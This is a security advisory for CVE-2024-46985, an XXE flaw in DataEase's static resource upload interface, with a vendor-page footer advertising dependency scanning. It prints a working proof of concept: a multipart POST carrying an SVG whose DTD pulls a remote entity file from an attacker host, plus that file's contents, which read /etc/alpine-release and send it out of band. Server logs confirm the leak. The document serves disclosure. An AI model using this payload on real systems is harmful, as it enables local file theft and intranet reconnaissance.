CVE-2024-46985: DataEase has an XML External Entity Reference vulnerability
There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.
- send request:
POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn
------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a
<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
%EvilDTD;
%LoadOOBEnt;
%OOB;
]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--
// 1.dtd的内容
<!ENTITY % resource SYSTEM "file:///etc/alpine-release">
<!ENTITY % LoadOOBEnt "<!ENTITY % OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
- After sending the request, the content of the file /etc/alpine-release is successfully read
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
Affected versions: <= 2.10.0
References
Detect and mitigate CVE-2024-46985 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →